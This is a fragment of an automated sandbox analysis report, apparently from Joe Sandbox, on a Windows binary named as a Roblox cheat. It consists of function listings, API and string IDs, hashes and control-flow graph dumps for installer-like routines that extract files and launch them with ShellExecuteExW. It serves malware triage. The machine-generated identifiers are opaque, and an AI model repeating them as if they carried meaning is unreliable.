                                                                              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                                              • API String ID: 1496594111-2013832382
                                                                              • Opcode ID: 7c4a34b53ce793e8483b627db677786fa0ac65cb43c3a9d0b7710463073bebd5
                                                                              • Instruction ID: 982f2519eb6f9fab116684a6f4ef45daa713d719718ef8de0b64458cd7236bef
                                                                              • Opcode Fuzzy Hash: 7c4a34b53ce793e8483b627db677786fa0ac65cb43c3a9d0b7710463073bebd5
                                                                              • Instruction Fuzzy Hash: 11320A31A09B8299EB319F64E8421E933A9FF44358F500277EA4DA77A5EF3CE655C340
                                                                              Function 00007FF693E698DC Relevance: 25.2, APIs: 3, Strings: 11, Instructions: 702COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00007FF693E68E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF693E68F8D
                                                                              • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF693E69F75
                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF693E6A42F
                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF693E6A435
                                                                                • Part of subcall function 00007FF693E70BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF693E70B44), ref: 00007FF693E70BE9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                                              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                              • API String ID: 3629253777-3268106645
                                                                              • Opcode ID: b25d02a64e189599c37322a65615bf52690cf95b5c81f30031a3f66b0c144a2e
                                                                              • Instruction ID: 230c85648df0796889b92a6f87d8c9595912781a334153f50f7515d8d43495a5
                                                                              • Opcode Fuzzy Hash: b25d02a64e189599c37322a65615bf52690cf95b5c81f30031a3f66b0c144a2e
                                                                              • Instruction Fuzzy Hash: E162B062E1968285EB30DF25D4462BD33AAFB40788F805173EB5EA7695EF3CE944C341
                                                                              Function 00007FF693E81900 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 195libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1910 7ff693e81900-7ff693e81989 call 7ff693e81558 1913 7ff693e8198b-7ff693e819af call 7ff693e81868 RaiseException 1910->1913 1914 7ff693e819b4-7ff693e819d1 1910->1914 1920 7ff693e81bb8-7ff693e81bd5 1913->1920 1915 7ff693e819e6-7ff693e819ea 1914->1915 1916 7ff693e819d3-7ff693e819e4 1914->1916 1919 7ff693e819ed-7ff693e819f9 1915->1919 1916->1919 1921 7ff693e819fb-7ff693e81a0d 1919->1921 1922 7ff693e81a1a-7ff693e81a1d 1919->1922 1930 7ff693e81b89-7ff693e81b93 1921->1930 1931 7ff693e81a13 1921->1931 1923 7ff693e81ac4-7ff693e81acb 1922->1923 1924 7ff693e81a23-7ff693e81a26 1922->1924 1926 7ff693e81acd-7ff693e81adc 1923->1926 1927 7ff693e81adf-7ff693e81ae2 1923->1927 1928 7ff693e81a3d-7ff693e81a52 LoadLibraryExA 1924->1928 1929 7ff693e81a28-7ff693e81a3b 1924->1929 1926->1927 1932 7ff693e81ae8-7ff693e81aec 1927->1932 1933 7ff693e81b85 1927->1933 1934 7ff693e81aa9-7ff693e81ab2 1928->1934 1935 7ff693e81a54-7ff693e81a67 GetLastError 1928->1935 1929->1928 1929->1934 1936 7ff693e81b95-7ff693e81ba6 1930->1936 1937 7ff693e81bb0 call 7ff693e81868 1930->1937 1931->1922 1944 7ff693e81b1b-7ff693e81b2e GetProcAddress 1932->1944 1945 7ff693e81aee-7ff693e81af2 1932->1945 1933->1930 1940 7ff693e81abd 1934->1940 1941 7ff693e81ab4-7ff693e81ab7 FreeLibrary 1934->1941 1938 7ff693e81a69-7ff693e81a7c 1935->1938 1939 7ff693e81a7e-7ff693e81aa4 call 7ff693e81868 RaiseException 1935->1939 1936->1937 1952 7ff693e81bb5 1937->1952 1938->1934 1938->1939 1939->1920 1940->1923 1941->1940 1944->1933 1949 7ff693e81b30-7ff693e81b43 GetLastError 1944->1949 1945->1944 1946 7ff693e81af4-7ff693e81aff 1945->1946 1946->1944 1950 7ff693e81b01-7ff693e81b08 1946->1950 1954 7ff693e81b5a-7ff693e81b81 call 7ff693e81868 RaiseException call 7ff693e81558 1949->1954 1955 7ff693e81b45-7ff693e81b58 1949->1955 1950->1944 1956 7ff693e81b0a-7ff693e81b0f 1950->1956 1952->1920 1954->1933 1955->1933 1955->1954 1956->1944 1958 7ff693e81b11-7ff693e81b19 1956->1958 1958->1933 1958->1944
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                                                                              • String ID: H
                                                                              • API String ID: 3432403771-2852464175
                                                                              • Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                                              • Instruction ID: d45c564a5d3cffc10c2af2dc9a8b465ca75d98ac3c0727cb50e75c895dc56cf0
                                                                              • Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                                              • Instruction Fuzzy Hash: D0912B32E05B568AEB60CFA5D8466AC33B9FB08B98F454576DE0DA7754EF38E845C300
                                                                              Function 00007FF693E7F4E0 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 285COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1990 7ff693e7f4e0-7ff693e7f523 1991 7ff693e7f529-7ff693e7f565 call 7ff693e83cf0 1990->1991 1992 7ff693e7f894-7ff693e7f8b9 call 7ff693e51fa0 call 7ff693e82320 1990->1992 1998 7ff693e7f56a-7ff693e7f571 1991->1998 1999 7ff693e7f567 1991->1999 2001 7ff693e7f573-7ff693e7f577 1998->2001 2002 7ff693e7f582-7ff693e7f586 1998->2002 1999->1998 2005 7ff693e7f57c-7ff693e7f580 2001->2005 2006 7ff693e7f579 2001->2006 2003 7ff693e7f58b-7ff693e7f596 2002->2003 2004 7ff693e7f588 2002->2004 2007 7ff693e7f59c 2003->2007 2008 7ff693e7f628 2003->2008 2004->2003 2005->2003 2006->2005 2009 7ff693e7f5a2-7ff693e7f5a9 2007->2009 2010 7ff693e7f62c-7ff693e7f62f 2008->2010 2011 7ff693e7f5ab 2009->2011 2012 7ff693e7f5ae-7ff693e7f5b3 2009->2012 2013 7ff693e7f637-7ff693e7f63a 2010->2013 2014 7ff693e7f631-7ff693e7f635 2010->2014 2011->2012 2015 7ff693e7f5e5-7ff693e7f5f0 2012->2015 2016 7ff693e7f5b5 2012->2016 2017 7ff693e7f660-7ff693e7f673 call 7ff693e663ac 2013->2017 2018 7ff693e7f63c-7ff693e7f643 2013->2018 2014->2013 2014->2017 2019 7ff693e7f5f5-7ff693e7f5fa 2015->2019 2020 7ff693e7f5f2 2015->2020 2021 7ff693e7f5ca-7ff693e7f5d0 2016->2021 2029 7ff693e7f698-7ff693e7f6ed call 7ff693e8797c call 7ff693e5129c call 7ff693e632a8 call 7ff693e51fa0 2017->2029 2030 7ff693e7f675-7ff693e7f693 call 7ff693e713c4 2017->2030 2018->2017 2022 7ff693e7f645-7ff693e7f65c 2018->2022 2024 7ff693e7f8ba-7ff693e7f8c1 2019->2024 2025 7ff693e7f600-7ff693e7f607 2019->2025 2020->2019 2026 7ff693e7f5b7-7ff693e7f5be 2021->2026 2027 7ff693e7f5d2 2021->2027 2022->2017 2035 7ff693e7f8c6-7ff693e7f8cb 2024->2035 2036 7ff693e7f8c3 2024->2036 2031 7ff693e7f60c-7ff693e7f612 2025->2031 2032 7ff693e7f609 2025->2032 2033 7ff693e7f5c3-7ff693e7f5c8 2026->2033 2034 7ff693e7f5c0 2026->2034 2027->2015 2057 7ff693e7f742-7ff693e7f74f ShellExecuteExW 2029->2057 2058 7ff693e7f6ef-7ff693e7f73d call 7ff693e8797c call 7ff693e5129c call 7ff693e65b60 call 7ff693e51fa0 2029->2058 2030->2029 2031->2024 2039 7ff693e7f618-7ff693e7f622 2031->2039 2032->2031 2033->2021 2040 7ff693e7f5d4-7ff693e7f5db 2033->2040 2034->2033 2041 7ff693e7f8cd-7ff693e7f8d4 2035->2041 2042 7ff693e7f8de-7ff693e7f8e6 2035->2042 2036->2035 2039->2008 2039->2009 2047 7ff693e7f5dd 2040->2047 2048 7ff693e7f5e0 2040->2048 2049 7ff693e7f8d9 2041->2049 2050 7ff693e7f8d6 2041->2050 2044 7ff693e7f8eb-7ff693e7f8f6 2042->2044 2045 7ff693e7f8e8 2042->2045 2044->2010 2045->2044 2047->2048 2048->2015 2049->2042 2050->2049 2059 7ff693e7f846-7ff693e7f84e 2057->2059 2060 7ff693e7f755-7ff693e7f75f 2057->2060 2058->2057 2062 7ff693e7f882-7ff693e7f88f 2059->2062 2063 7ff693e7f850-7ff693e7f866 2059->2063 2064 7ff693e7f761-7ff693e7f764 2060->2064 2065 7ff693e7f76f-7ff693e7f772 2060->2065 2062->1992 2067 7ff693e7f87d call 7ff693e8220c 2063->2067 2068 7ff693e7f868-7ff693e7f87b 2063->2068 2064->2065 2069 7ff693e7f766-7ff693e7f76d 2064->2069 2070 7ff693e7f774-7ff693e7f77f call 7ff693ebe188 2065->2070 2071 7ff693e7f78e-7ff693e7f7ad call 7ff693ebe1b8 call 7ff693e7fe24 2065->2071 2067->2062 2068->2067 2074 7ff693e7f8fb-7ff693e7f903 call 7ff693e87904 2068->2074 2069->2065 2076 7ff693e7f7e3-7ff693e7f7f0 CloseHandle 2069->2076 2070->2071 2091 7ff693e7f781-7ff693e7f78c ShowWindow 2070->2091 2071->2076 2097 7ff693e7f7af-7ff693e7f7b2 2071->2097 2082 7ff693e7f805-7ff693e7f80c 2076->2082 2083 7ff693e7f7f2-7ff693e7f803 call 7ff693e713c4 2076->2083 2089 7ff693e7f82e-7ff693e7f830 2082->2089 2090 7ff693e7f80e-7ff693e7f811 2082->2090 2083->2082 2083->2089 2089->2059 2096 7ff693e7f832-7ff693e7f835 2089->2096 2090->2089 2095 7ff693e7f813-7ff693e7f828 2090->2095 2091->2071 2095->2089 2096->2059 2099 7ff693e7f837-7ff693e7f845 ShowWindow 2096->2099 2097->2076 2100 7ff693e7f7b4-7ff693e7f7c5 GetExitCodeProcess 2097->2100 2099->2059 2100->2076 2101 7ff693e7f7c7-7ff693e7f7dc 2100->2101 2101->2076
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
                                                                              • String ID: .exe$.inf$Install$p
                                                                              • API String ID: 1054546013-3607691742
                                                                              • Opcode ID: b874a5522ab24c4bf8c8fdcb584493d20a75b8ddd416e54ebb3c32214babb66c
                                                                              • Instruction ID: f3e1278aa8b4932c38e126b390afff583bfbc8f26534bfdb8735f62e378e3565
                                                                              • Opcode Fuzzy Hash: b874a5522ab24c4bf8c8fdcb584493d20a75b8ddd416e54ebb3c32214babb66c
                                                                              • Instruction Fuzzy Hash: EFC16262F1860295FE20CB65D9522B92379EF857C4F0444B7DA4EE7AA6DF3CE8528304
                                                                              Function 00007FF693E7F0A4 Relevance: 16.6, APIs: 11, Instructions: 102COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
                                                                              • String ID:
                                                                              • API String ID: 4119318379-0
                                                                              • Opcode ID: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
                                                                              • Instruction ID: e721537cb22758f6fd4f8a1a85d4aeeda945ff74ab859da1a08d3f43d8c43ee0
                                                                              • Opcode Fuzzy Hash: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
                                                                              • Instruction Fuzzy Hash: 71411231B1474286F760CF62E812BAA2374EB89BC8F441176ED0EABB95CF3DE4458754
                                                                              Function 00007FF693E5EF10 Relevance: 11.0, APIs: 7, Instructions: 453COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 3668304517-0
                                                                              • Opcode ID: fb01f854b328a6d61e8d667f54c21880ed41a16528d753221fb4dba11c1ecfae
                                                                              • Instruction ID: 34e3783ad21ce1057b06060f7662b87245d11858f40a332b3ca25ca1ea83aa70
                                                                              • Opcode Fuzzy Hash: fb01f854b328a6d61e8d667f54c21880ed41a16528d753221fb4dba11c1ecfae
                                                                              • Instruction Fuzzy Hash: C612A062F08B4285EE20DB65D4462BD2379EB457A8F400277DA5CE7ADADF3CE586C340
                                                                              Function 00007FF693E624C0 Relevance: 9.2, APIs: 6, Instructions: 164filetimeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 3529 7ff693e624c0-7ff693e624fb 3530 7ff693e624fd-7ff693e62504 3529->3530 3531 7ff693e62506 3529->3531 3530->3531 3532 7ff693e62509-7ff693e62578 3530->3532 3531->3532 3533 7ff693e6257a 3532->3533 3534 7ff693e6257d-7ff693e625a8 CreateFileW 3532->3534 3533->3534 3535 7ff693e62688-7ff693e6268d 3534->3535 3536 7ff693e625ae-7ff693e625de GetLastError call 7ff693e66a0c 3534->3536 3538 7ff693e62693-7ff693e62697 3535->3538 3545 7ff693e6262c 3536->3545 3546 7ff693e625e0-7ff693e6262a CreateFileW GetLastError 3536->3546 3539 7ff693e62699-7ff693e6269c 3538->3539 3540 7ff693e626a5-7ff693e626a9 3538->3540 3539->3540 3542 7ff693e6269e 3539->3542 3543 7ff693e626ab-7ff693e626af 3540->3543 3544 7ff693e626cf-7ff693e626e3 3540->3544 3542->3540 3543->3544 3547 7ff693e626b1-7ff693e626c9 SetFileTime 3543->3547 3548 7ff693e6270c-7ff693e62735 call 7ff693e82320 3544->3548 3549 7ff693e626e5-7ff693e626f0 3544->3549 3550 7ff693e62632-7ff693e6263a 3545->3550 3546->3550 3547->3544 3551 7ff693e62708 3549->3551 3552 7ff693e626f2-7ff693e626fa 3549->3552 3553 7ff693e6263c-7ff693e62653 3550->3553 3554 7ff693e62673-7ff693e62686 3550->3554 3551->3548 3556 7ff693e626fc 3552->3556 3557 7ff693e626ff-7ff693e62703 call 7ff693e520b0 3552->3557 3558 7ff693e62655-7ff693e62668 3553->3558 3559 7ff693e6266e call 7ff693e8220c 3553->3559 3554->3538 3556->3557 3557->3551 3558->3559 3562 7ff693e62736-7ff693e6273b call 7ff693e87904 3558->3562 3559->3554
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 3536497005-0
                                                                              • Opcode ID: bf6d388e0ddc62a07829c0e0ddc79988d82f0ae4bc2505d9adb649ad5df9f7e3
                                                                              • Instruction ID: d72e2ff3fb74b3afd61fcc7632a58b037d2d58f6e909153a5a2c12d044e2326f
                                                                              • Opcode Fuzzy Hash: bf6d388e0ddc62a07829c0e0ddc79988d82f0ae4bc2505d9adb649ad5df9f7e3
                                                                              • Instruction Fuzzy Hash: 6B61D172A1864185EB308B29E40237E77A5FB847ACF101226DFAD53AE4DF3DD4548704
                                                                              Function 00007FF693E7B014 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54windowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: GlobalResource$Object$AllocBitmapDeleteGdipLoadLock$CreateFindFreeFromSizeofUnlock
                                                                              • String ID: ]
                                                                              • API String ID: 2347093688-3352871620
                                                                              • Opcode ID: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                                              • Instruction ID: 5580ecdf10b8f7cf56258d7404fb98d9bee2191417bee7cd25161fe1668601f7
                                                                              • Opcode Fuzzy Hash: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                                              • Instruction Fuzzy Hash: 2C119625B0D34781FA749722A64737952E9EF88BC4F0800B6D95E9BB97DE2CEC048700
                                                                              Function 00007FF693E7AE1C Relevance: 7.5, APIs: 5, Instructions: 27windowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                                              • String ID:
                                                                              • API String ID: 1266772231-0
                                                                              • Opcode ID: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                                              • Instruction ID: 8daa4780184bbd3567f91dc1fa3ebbb8749dabb66de46b6016b29777d99f3c89
                                                                              • Opcode Fuzzy Hash: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                                              • Instruction Fuzzy Hash: E3F03C21E3864282FBA09B21F896A366379FFD0744F905472F54FA6954DF2CD108CB00
                                                                              Function 00007FF693E791E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                              • String ID: EDIT
                                                                              • API String ID: 4243998846-3080729518
                                                                              • Opcode ID: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                                              • Instruction ID: fe3a26cff551708ae8b2753a3a27a0a5e5bf93eecd2f270ccb7afc9a30292895
                                                                              • Opcode Fuzzy Hash: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                                              • Instruction Fuzzy Hash: 3D018121B18B8381FA709B22F8123B663A9EF98740F440073D94EAA695EF2CE1498740
                                                                              Function 00007FF693E62CE0 Relevance: 6.1, APIs: 4, Instructions: 136fileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
